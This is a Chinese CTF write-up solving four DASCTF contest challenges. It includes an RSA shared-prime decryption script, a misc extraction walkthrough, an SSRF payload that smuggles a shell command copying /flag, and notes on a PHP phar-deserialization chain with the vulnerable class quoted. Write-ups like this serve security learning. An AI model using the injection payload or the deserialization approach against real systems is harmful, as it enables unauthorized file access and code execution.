dasctf 12月月赛 wp

asa

两个n用了同一个质数，将n分解后按照顺序解出密钥在做aes解密就可以得到flag

from Crypto.Cipher import AES
from Crypto.Util.number import bytes_to_long, long_to_bytes

def ex_gcd(a, b):
    if b == 0:
        return a, 1, 0
    g, tx, ty = ex_gcd(b, a % b)
    x = ty
    y = tx - a // b * ty
    return g, x, y

def rsa_dec(n, p, q, e, c):
    phi = (p - 1) * (q - 1)
    _, d, _ = ex_gcd(e, phi)
    return pow(c, d, n)

e = 65537
n1 = 0x661d752110bcc6ee5ca33edaf244716cccce6400dfdbfd84ce6ae2d8fbbeb2f61584da7668768403b6135e7810eae9d4d8e044935f8680de5324c3fc0f9bffb01812f9d2ac9055ee8dbd17b90c5a60cb7595a82f24a075d951db3b7f913b8543ecd52b8c8464ce348c3970d511ae911e814f9ca33b8412db2730e61820f5de47
n2 = 0x9f159326c907441326c88d17eae1c6e8aaea23922c5e628a585294e379e9245644f9c249c57f54a2b83921b4adc988fecc90c00feb6936d9be1f3a5ffae951b74ffbc6fc7aa11743e4ca179a937392dacf931e820d1d83016562ff608e8c59ef7310654a09bbba4a0129f71dcb61bd9bef073bbb93bfcac4a7a2e81156dbb32d
c1 = 0xd7931796fa39cfa37c0b621c01175904206dff1d74a28369dcd6517957ed76c5eb7d4934cbeb902119f9215f9ae7926debe3abe856244b45dbb4caaa2b93dbb79a3ca1a9813e1466c49fe3c03e5462811afbf3f40ff79927f9fe3681b7f3cef34466b9a736512f4931b5026eefacbae9be6e408085a7a636c514574c3b22ffe
c2 = 0x6240740d41a539a88634726cf0a791a87e02419c3c3e00dff62eba59e81a93fd04a59109e57f64fc375b9a321583b6fa133317eb5c4e6eb1e6f6d9a0b4ae6ff0c54423718811f7956cd63b7bf9c7f8e29f48dad8f05b63b71d6c5112d91864adba0d6bb342c67aee39ccd5e2a6928a8e4ab2248d29a0c990bae821b31b39b1f3
p = 9540203717217880059997385799331301649727503984010337568404427747385824530958536656147747848448822264268428226235860927158082497191830274046098671199542207

q1 = n1 // p
q2 = n2 // p

key = rsa_dec(n1, p, q1, e, c1)
iv = rsa_dec(n2, p, q2, e, c2)
print(key, iv)

key = long_to_bytes(key)
iv = long_to_bytes(iv)
c = 0xf8559d671b720cd336f2d8518ad6eac8c405585158dfde74ced376ba42d9fe984d519dc185030ddec7b4dc240fd90fa8
c = long_to_bytes(c)

m = AES.new(key, AES.MODE_CBC, iv).decrypt(c)
print(m)

马老师

所有二维码扫出来是经典语录，没什么用。binwalk看到压缩包，foremost分解出来，其中棋盘图片是zip伪加密。

打开之后用狗眼看出来**md5(NianQingRenBuJiangWuDe)**得到的字符串是另外两个文件的解压密码，打开后根据要求还原成ook！密文，放到网站解密得到flag

easyjs

做法同网鼎杯总决赛-半决赛easyjs。

payload:{“url”:”http://127.0.0.2:10300/debug?url=http://a%2527@a;cp${IFS}/flag${IFS}/tmp/log%00"}

easyphp

做法同XNUCA2020 Final 个人赛php。

phar反序列化。先伪协议读取template.php内容

<?php

class Template{

    public $content;
    public $pattern;
    public $suffix;

    public function __construct($content){
    $this->content = $content;
    $this->pattern = "/{{([a-z]+)}}/";
    $this->suffix = ".html";
}

public function __destruct() {
	$this->render();
}

public function render() {
	while (True) {
		if(preg_match($this->pattern, $this->content, $matches)!==1) 
		break;
		global ${$matches[1]};
		if(isset(${$matches[1]})) {
			$this->content = preg_replace($this->pattern, ${$matches[1]}, $this->content);
		} 
		else{
			break;
		}
	}
	if(strlen($this->suffix)>5) {
		echo "error suffix";
		die();
	}
	$filename = '/var/www/html/uploads/' . md5($_SERVER['REMOTE_ADDR']) . "/" . md5($this->content) . $this->suffix;
	file_put_contents($filename, $this->content);
	echo "Your html file is in " . $filename;
}
}
?>

可能需要修改suffix来执行php内容；存在文件上传；destruct魔术方法可以启动file_put_contents的文件操作，这样可以执行phar反序列化。先本地起个环境，执行内容，然后phar操作。